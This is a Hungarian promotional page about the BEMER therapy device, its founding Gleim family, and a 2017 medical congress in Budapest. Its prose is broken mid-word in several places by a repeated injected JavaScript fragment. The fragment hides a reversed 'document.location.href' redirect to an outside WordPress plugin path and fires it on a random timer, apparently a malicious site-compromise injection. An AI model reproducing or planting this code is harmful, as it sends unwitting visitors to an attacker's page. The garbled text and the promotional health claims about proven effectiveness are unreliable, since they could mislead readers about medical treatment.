Amikor Peter Gleim 1998-ban elkezdte megvalósítani egyik álmát a BEMER-t, tudta, hogy azok az eszmék, amelyben hitt sikerre viszik az elképzeléseit. Fiai Pit és Nik Gleim szintén beálltak abba az irányvonalba, amelyet az apai tekintély és példa mutatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott a BEMER üzlettel kapcsolatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosan. A vállalkozó szellemű Gleim család Stephanie-vel is kibővűlt és közös tettek azért az elképzelésért, hogy először adni kell, mielőtt kapnának. A BEMER terápia ma már a föld szinte minden táján jól ismert technológia.” Ha nagyszerűen akarsz teljesíteni, különlegeset akarsz teremteni, akkor keményebben kell dogoznod, mint kellene” – mondta Nik Gleim a BEMER egyik vezérigazgatója. 1998-ban – a BEMER, születésének évében láthatóvá vált a BEMER hatás, felhasználóknál és munkatársaknál egyaránt. Voltak, akik tudományos bizonyítékokat kértek, ami érthető egy ilyen jellegű terápiás megoldásnál. Orvosi gyakorlatban a tény alapú orvosláshoz bizonyítékok kellenek. Orvosok voltak tehát azok, akik a bizonyítékokat kérték. Volt azonban egy másik embercsoport is, akiknek az egyetemes orvoslás nem tudott segíteni. Olyan emberek, akik különböző panaszokkal élnek. Olyan személyek, akiknek a gyógyszerek nehezen hatnak, hiszen a mikrokeringés zavara miatt a hatóanyag nem jut el a megfelelő helyre. Ezek a személyek kezdték el használni a BEMER terápiát és Ők lettek az első BEMER törzsvevők. Az első kettős vakpróbás tanulmányok azonban igazolták a BEMER hatékonyságát tudásra lehetett fordítani a hitet. A készülék hatékonysága igazolva volt, de a magyarázat nem volt teljes. Peter Gleim és Prof. Dr. Klopp találkozása segített a magyarázatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tok bizonyításában, hiszen filmre lehetett venni mi történik az emberi szervezetben a BEMER kezelés megkezdésével.

Ennek a tudásnak lesz egy nagyszerű rendezvénye Budapesten.

Időpont: 2017. szeptember 30 – október 01.
Helyszín: Budapest, Danubius Hotel Hélia

​Budapesten kerül megrendezésre a kétnapos Bemer Nemzetközi Orvos Kongresszus.
A rendezvényt nem csupán orvosok látoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}togathatják, hanem szeretettel várunk minden egészség és Bemer iránt érdeklődőt!
Orvosoknak 12 toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}továbbképzési pont! ​
Egészségügyi szakdolgozóknak 18 toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}továbbképzési pont! AEEK által akkreditálva.

Számos tapasztalt magyar szakember mellett, a kétnapos rendezvényen a feltaláló Prof. Dr. med Rainer Klopp is beszámol legújabb kutatási eredményeiről.
A Bemer cég elnöke, Pit Gleim szintén jelen lesz.​